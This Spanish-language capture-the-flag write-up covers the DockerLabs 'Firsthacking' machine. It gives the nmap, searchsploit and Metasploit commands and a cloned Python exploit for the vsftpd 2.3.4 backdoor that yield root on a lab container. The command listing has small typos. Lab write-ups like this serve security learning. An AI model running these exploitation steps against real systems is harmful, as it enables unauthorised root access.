Post

Firsthacking , DockerLabs

Posted
By first_atack 1 min read

logodocker

En este reto de DockerLabs nos encontramos con una maquina sumamente facil con escaneo de puertos y explotacion a traves de exploit

Herramientas y recursos usados

  • nmap
  • searchsploit
  • msfconsole
  • python

Enumeracion

Empezamos lanzando un nmap contra el objetivo .

1

sudo nmap -p- -sS -sC -sV --min-rate=5000 -n -vvv 172.17.0.2 -oX firsthacking

Reporte nmap

Nmap nos indica que tenemos el 21 que coresponde al servicio ftp fijaos en la version, si solo tenemos ese acceso no hay otra que buscar por ese servicio y con esa version de software.

Vamos al grano pq en mi opinion esta deberia ser muy facil o es la resaca de haber intentado hacer la hacktheheaven sin exito. Asi que sin mas ejecutamos

1

searchsploit vsftpd

Obtenemos lo que esperaba

searchsploit

Explotacion

Con la info ya conseguida vamos a msfconsole y intducimos lo siguente.

1
2
3
4
5

search vsftp  
use 1
show options
set RHOSTS $ipvictima
run

msfprin

endmsf

Como veis en la segunda imagen somos root.

Con python

exploit

Este exploit necesita de la instalacion de pwntools creo un entrono virtual para no tener mierda por ahi .

1
2
3
4
5
6
7

python3 -m venv vsftpd2.4
source  vsftpd2.4/bin/activate 
pip3 install pwntools
git clone https://github.com/Hellsender01/vsftpd_2.3.4_Exploit.github
cd  vsftpd_2.3.4
chomd +x exploit.py
python3 exploit.py $ipvictima

clone

root

Esta maquina es para aprender a usar google si la comparas con la que nombraba antes que es un infireno para el que esta aprendiendo.

En fin hasta la proxima maquina.

DockerLabs
ctf hacking etico
This post is licensed under CC BY 4.0 by the author.

Comments powered by Disqus.